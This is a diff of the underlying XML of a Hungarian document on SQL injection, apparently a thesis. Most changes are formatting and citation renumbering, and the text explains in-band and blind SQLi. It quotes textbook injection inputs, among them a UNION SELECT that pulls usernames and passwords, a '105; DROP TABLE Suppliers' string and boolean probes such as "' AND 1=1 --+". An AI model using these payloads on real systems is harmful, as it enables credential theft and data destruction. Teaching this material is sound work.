-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc70961909 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
             </w:r>
@@ -2930,14 +2676,13 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:t>12</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:t>14</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
@@ -2949,52 +2694,55 @@
             <w:tabs>
               <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
             </w:tabs>
+            <w:spacing w:line="360" w:lineRule="auto"/>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:noProof/>
               <w:sz w:val="22"/>
               <w:szCs w:val="22"/>
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc70610888" w:history="1">
+          <w:hyperlink w:anchor="_Toc70961910" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
+                <w:noProof/>
                 <w:lang w:val="hu-HU"/>
               </w:rPr>
               <w:t>Nyilatkozat</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:tab/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70610888 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc70961910 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
             </w:r>
@@ -3002,14 +2750,13 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:t>13</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:t>15</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
@@ -3021,52 +2768,55 @@
             <w:tabs>
               <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
             </w:tabs>
+            <w:spacing w:line="360" w:lineRule="auto"/>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:noProof/>
               <w:sz w:val="22"/>
               <w:szCs w:val="22"/>
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc70610889" w:history="1">
+          <w:hyperlink w:anchor="_Toc70961911" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
+                <w:noProof/>
                 <w:lang w:val="hu-HU"/>
               </w:rPr>
               <w:t>Köszönetnyilvánítás</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:tab/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70610889 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc70961911 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
             </w:r>
@@ -3074,14 +2824,13 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:t>14</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:t>16</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
@@ -3137,7 +2886,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="5" w:name="_Toc70610873"/>
+      <w:bookmarkStart w:id="5" w:name="_Toc70961899"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3457,7 +3206,7 @@
         </w:numPr>
         <w:ind w:left="284" w:hanging="284"/>
       </w:pPr>
-      <w:bookmarkStart w:id="6" w:name="_Toc70610874"/>
+      <w:bookmarkStart w:id="6" w:name="_Toc70961900"/>
       <w:r>
         <w:t>SQL INJECTION</w:t>
       </w:r>
@@ -3744,14 +3493,13 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>--</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:vertAlign w:val="superscript"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>1</w:t>
+        <w:t xml:space="preserve">-- </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>[1]</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3849,14 +3597,21 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>SELECT name, description FROM products WHERE category = ’Gifts’ UNION SELECT username, password FROM users--</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:vertAlign w:val="superscript"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>1</w:t>
+        <w:t>SELECT name, description FROM products WHERE category = ’Gifts’ UNION SELECT username, password FROM users</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">-- </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>[1]</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3947,7 +3702,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="7" w:name="_Toc70610875"/>
+      <w:bookmarkStart w:id="7" w:name="_Toc70961901"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3970,6 +3725,39 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Stlus3"/>
+        <w:ind w:left="709" w:hanging="709"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="8" w:name="_Toc70961902"/>
+      <w:r>
+        <w:t>Sávon belüli</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>(in-band</w:t>
+      </w:r>
+      <w:r>
+        <w:t>, classic</w:t>
+      </w:r>
+      <w:r>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> SQLi</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="8"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:jc w:val="both"/>
         <w:rPr>
@@ -3980,19 +3768,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">Továbbiakban a kódok </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>utáni felső indexben található szám</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>, mint hivatkozás</w:t>
+        <w:t>Ahogy a korábbi példa szemléltette,</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4004,74 +3780,43 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">megegyezik </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>az irodalomjegyzék</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>ben lévő tétel sorszámával.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Stlus3"/>
-        <w:ind w:left="709" w:hanging="709"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="8" w:name="_Toc70610876"/>
-      <w:r>
-        <w:t>Sávon belüli</w:t>
-      </w:r>
-      <w:r>
+        <w:t>a s</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ikeres SQL </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>i</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>njection támadás képes</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
-        <w:t>(in-band</w:t>
-      </w:r>
-      <w:r>
-        <w:t>, classic</w:t>
-      </w:r>
-      <w:r>
-        <w:t>)</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> SQLi</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="8"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Ahogy a korábbi példa szemléltette,</w:t>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>érzékeny adatok kiolvasására az adatbázisból</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4083,25 +3828,19 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>a s</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">ikeres SQL </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>i</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>njection támadás képes</w:t>
+        <w:t>Egyik l</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>egfőbb eszköze a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>z</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4111,15 +3850,23 @@
       </w:r>
       <w:r>
         <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>érzékeny adatok kiolvasására az adatbázisból</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>.</w:t>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>UNION</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> operátor</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>, amely lehetővé tesz egy vagy több további</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4129,21 +3876,29 @@
       </w:r>
       <w:r>
         <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Egyik l</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>egfőbb eszköze a</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>z</w:t>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>SELECT</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> lekérdezés végrehajtását és az eredmények hozzáfűzését az eredeti lekérdezéshez.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Sikerességének feltétele, hogy a két</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> vagy több</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4157,65 +3912,6 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>UNION</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> operátor</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>, amely lehetővé tesz egy vagy több további</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>SELECT</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> lekérdezés végrehajtását és az eredmények hozzáfűzését az eredeti lekérdezéshez.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Sikerességének feltétele, hogy a két</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> vagy több</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>SELECT</w:t>
       </w:r>
       <w:r>
@@ -4330,6 +4026,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>105; DROP TABLE Suppliers</w:t>
       </w:r>
       <w:r>
@@ -4337,7 +4034,13 @@
           <w:vertAlign w:val="superscript"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>2</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>[2]</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4546,7 +4249,13 @@
           <w:vertAlign w:val="superscript"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>2</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>[2]</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4702,10 +4411,9 @@
       </w:r>
       <w:r>
         <w:rPr>
-          <w:vertAlign w:val="superscript"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>3</w:t>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> [3]</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4856,7 +4564,7 @@
         <w:pStyle w:val="Stlus3"/>
         <w:ind w:left="709" w:hanging="709"/>
       </w:pPr>
-      <w:bookmarkStart w:id="9" w:name="_Toc70610877"/>
+      <w:bookmarkStart w:id="9" w:name="_Toc70961903"/>
       <w:r>
         <w:t>Vak (</w:t>
       </w:r>
@@ -5137,10 +4845,146 @@
       </w:r>
       <w:r>
         <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> [4]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>egy lekérdezést generál:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> SELECT title, description, doby FROM items WHERE id=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>’ AND 1=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>0</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
           <w:vertAlign w:val="superscript"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>4</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>[4]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Ha az </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">alkalmazás sebezhető SQL </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>I</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>njekcióval szemben, akkor nem ad vissza semmit</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, mivel ez egy hamis állítás, 1 nem egyenlő </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>0</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>-v</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>l.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Ezek után, ha</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> egy igaz állítást adunk meg: </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5148,13 +4992,36 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
+        <w:t>https://www.example.beaglesecurity.com/gallery.php?id=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>' AND 1=1 --+</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:vertAlign w:val="superscript"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>egy lekérdezést generál:</w:t>
+        <w:t>[4]</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5162,186 +5029,38 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> SELECT title, description, doby FROM items WHERE id=</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>1</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>’ AND 1=</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>0</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:vertAlign w:val="superscript"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>4</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Ha az </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">alkalmazás sebezhető SQL </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>I</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>njekcióval szemben, akkor nem ad vissza semmit</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, mivel ez egy hamis állítás, 1 nem egyenlő </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>0</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>-v</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>a</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>l.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>Ezek után, ha</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> egy igaz állítást </w:t>
+        <w:t>és az oldal tartalma megváltozik az előző hamis állapothoz képest, akkor a támadó arra következtethet, hogy az injekció működik</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">A logikai eredménytől (IGAZ vagy </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">adunk meg: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>https://www.example.beaglesecurity.com/gallery.php?id=</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>1</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>' AND 1=1 --+</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:vertAlign w:val="superscript"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>4</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
